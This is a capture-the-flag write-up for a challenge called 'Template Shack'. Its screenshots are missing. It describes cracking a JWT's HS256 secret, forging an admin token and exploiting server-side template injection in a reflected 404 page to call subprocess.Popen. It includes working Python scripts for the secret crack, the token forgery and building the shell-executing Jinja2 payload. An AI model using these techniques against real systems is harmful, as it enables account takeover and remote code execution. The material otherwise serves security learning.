Template Shack


img

img

Nothing out of place. Checking the cookies, we see what looks to be a JSON Web Token (three base64url-encoded segments separated by dots).

img

jwt.io confirms that it's a JWT and that it's signed with HS256 (HMAC-SHA256). HS256 is a symmetric scheme: the same secret the server uses to verify a token is the one used to sign it, so if we can recover that secret we can sign tokens of our own. Let's see if we can crack it.

img

Using jwt-tool to crack the key (a dictionary attack against the HMAC secret):

img

With the secret recovered, time to forge our own admin JWT:

img

By changing the cookie value to our forged JWT, we've accessed the admin account.

img
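The crack-and-forge step above, as an added example that is not the challenge's code and not jwt-tool's: a stdlib-only HS256 implementation that reads the unverified header (what jwt.io shows), runs a dictionary attack against the signature, and re-signs the claims with the username swapped to admin. The sample token, the secret "supersecret", the "username" claim and the wordlist are all constructed here; the real cookie's secret and claim names are not reproduced.

```python
"""Crack an HS256 JWT secret by dictionary attack, then forge an admin token.

Stdlib only; added example, not the challenge's code or jwt-tool's.
"""
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url_encode(data: bytes) -> str:
    # JWT uses base64url with the '=' padding stripped
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    # Re-add the padding that JWT strips before decoding
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256(signing_input: str, secret: str) -> bytes:
    return hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()


def sign(header: dict, payload: dict, secret: str) -> str:
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    return signing_input + "." + b64url_encode(hs256(signing_input, secret))


def decode_unverified(token: str):
    """Read header and claims without checking the signature (what jwt.io displays)."""
    header_b64, payload_b64, _ = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def verify(token: str, secret: str) -> bool:
    signing_input, _, sig_b64 = token.rpartition(".")
    return hmac.compare_digest(hs256(signing_input, secret), b64url_decode(sig_b64))


def crack(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate secret that reproduces the token's signature."""
    header, _ = decode_unverified(token)
    if header.get("alg") != "HS256":
        raise ValueError("not an HS256 token: %r" % header.get("alg"))
    for candidate in wordlist:
        if verify(token, candidate):
            return candidate
    return None


def forge_admin(token: str, secret: str) -> str:
    """Keep the header and claims, swap the username to admin, re-sign."""
    header, payload = decode_unverified(token)
    payload["username"] = "admin"  # assumed claim name; the challenge's may differ
    return sign(header, payload, secret)


# Constructed sample: a guest token signed with a weak secret, standing in for
# the cookie from the challenge. Secret, claims and wordlist are all made up here.
SECRET = "supersecret"
SAMPLE_TOKEN = sign({"typ": "JWT", "alg": "HS256"}, {"username": "guest"}, SECRET)
WORDLIST = ["password", "123456", "letmein", "changeme", "supersecret"]

if __name__ == "__main__":
    found = crack(SAMPLE_TOKEN, WORDLIST)
    print("cracked secret:", found)
    admin = forge_admin(SAMPLE_TOKEN, found)
    print("forged token:", admin)
    print("verifies with cracked secret:", verify(admin, found))
```

The check in crack() on the alg header matters in practice: a dictionary attack only makes sense for HMAC algorithms, and a token using RS256 or ES256 needs a different approach entirely.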

Most of the links in the admin panel go nowhere, and the only two that do resolve kick back a 404.

img

Interesting. The path that triggered the 404 is reflected in the error page, which means we control text that ends up in a server-rendered page.

Since the name of the challenge is 'Template Shack', let's jump straight to testing the reflected path for server-side template injection.

img

img

Template injection is a go!

Starting with the list of object subclasses:

img

we can look for the 'subprocess.Popen' class in the output:

img

To call it, we need its exact index in the list. Let's use slicing to find it:

img

By slicing from progressively higher indices, we can track down exactly where 'subprocess.Popen' sits.

img

img

Once it is the first entry of the slice, we know it's at index 405. That index is specific to this target: it depends on the Python version and on which modules the app has imported, so it has to be rediscovered on every instance.

Payload:

img

Full URL:

img

img
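The index hunt and the Popen payload above, as an added example that is not the challenge's or the author's code. It goes one step beyond the writeup: instead of slicing from higher and higher indices by hand, it bisects on a "does this slice contain subprocess.Popen" oracle, which needs only log2(n) requests. Locally the oracle is answered by inspecting this interpreter's own subclass list; against the target it would be answered by rendering the slice through the reflected 404 path and checking the response for the string 'subprocess.Popen'. The index it prints is this interpreter's, not the 405 found on the target.

```python
"""Locate subprocess.Popen in object.__subclasses__() by bisecting on slices,
then build the Jinja2 payload that calls it. Added example, not challenge code."""
import subprocess  # loaded so subprocess.Popen exists as a subclass of object
from typing import Callable, Optional

NEEDLE = "subprocess.Popen"


def gadget_list():
    # The same list the payload reaches via ''.__class__.__mro__[1].__subclasses__()
    return "".__class__.__mro__[1].__subclasses__()


def local_oracle(lo: int, hi: int) -> bool:
    """Stand-in for rendering {{ ''.__class__.__mro__[1].__subclasses__()[lo:hi] }}
    on the target and grepping the response; here it inspects the local list."""
    return NEEDLE in str(gadget_list()[lo:hi])


def locate(oracle: Callable[[int, int], bool], length: int) -> Optional[int]:
    """Bisect: halve the slice while it still contains the needle."""
    lo, hi = 0, length
    if not oracle(lo, hi):
        return None
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(lo, mid):
            hi = mid
        else:
            lo = mid
    return lo  # slice [lo:lo+1] contains it, so lo is the index


def build_payload(index: int, cmd: str) -> str:
    """Jinja2 expression calling Popen at the found index (stdout=-1 is PIPE)."""
    return (
        "{{''.__class__.__mro__[1].__subclasses__()[%d]"
        "(%r,shell=True,stdout=-1).communicate()[0]}}" % (index, cmd)
    )


def run_via_gadget(index: int, cmd: str) -> bytes:
    """Execute the same call locally to confirm the index really is Popen."""
    popen = gadget_list()[index]
    if popen is not subprocess.Popen:
        raise ValueError("index %d is %r, not subprocess.Popen" % (index, popen))
    return popen(cmd, shell=True, stdout=-1).communicate()[0]


if __name__ == "__main__":
    # Remotely the length comes from {{ ''.__class__.__mro__[1].__subclasses__()|length }}
    n = len(gadget_list())
    idx = locate(local_oracle, n)
    print("Popen index in this interpreter:", idx, "(the writeup found 405 on the target)")
    print("payload:", build_payload(idx, "id"))
    print("local check:", run_via_gadget(idx, "echo hello"))
```

The same oracle works for any other gadget (os._wrap_close, for example): change NEEDLE and the payload builder, and the bisection is unchanged.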